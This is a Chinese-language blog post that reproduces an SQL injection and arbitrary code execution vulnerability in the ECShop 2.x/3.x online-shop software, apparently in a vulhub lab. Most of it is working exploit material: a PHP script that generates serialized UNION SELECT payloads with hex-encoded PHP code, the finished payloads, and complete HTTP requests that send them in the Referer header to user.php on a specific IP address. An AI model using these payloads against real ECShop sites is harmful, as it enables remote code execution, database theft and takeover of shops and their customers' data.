ECShop 2.x/3.x SQL注入/任意代码执行漏洞

ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。

其2017年及以前的版本中,存在一处SQL注入漏洞,通过该漏洞可注入恶意数据,最终导致任意代码执行漏洞。其3.6.0最新版已修复该漏洞,vulhub中使用其2.7.3最新版与3.6.0次新版进行漏洞复现。

生成2.x和3.x的POC

<?php
$shell = bin2hex("{\$asd'];phpinfo\t();//}xxx");
$id = "-1' UNION/*";
$arr = [
    "num" => sprintf('*/SELECT 1,0x%s,2,4,5,6,7,8,0x%s,10-- -', bin2hex($id), $shell),
    "id" => $id
];

$s = serialize($arr);

$hash3 = '45ea207d7a2b68c49582d2d22adf953a';
$hash2 = '554fcae493e564ee0dc75bdf2ebf94ca';

echo "POC for ECShop 2.x: \n";
echo "{$hash2}ads|{$s}{$hash2}";
echo "\n\nPOC for ECShop 3.x: \n";
echo "{$hash3}ads|{$s}{$hash3}";

2.x poc

554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca

3.x poc

45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953a

2.x 生成的POC,放在Referer里发送:

GET /user.php HTTP/1.1
Host: 188.40.189.134:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca
Cookie: has_js=1; ECS_ID=7ad6d31398e1424ba25ada22c6a75360d8b9de91; ECS[visit_times]=1
Upgrade-Insecure-Requests: 1

3.x生成poc,放在Referer里发送:

GET /user.php HTTP/1.1
Host: 188.40.189.134:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: 45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953a
Cookie: has_js=1; ECS_ID=7ad6d31398e1424ba25ada22c6a75360d8b9de91; ECS[visit_times]=2
Upgrade-Insecure-Requests: 1

大概就这些.....

点赞

发表评论

电子邮件地址不会被公开。必填项已用 * 标注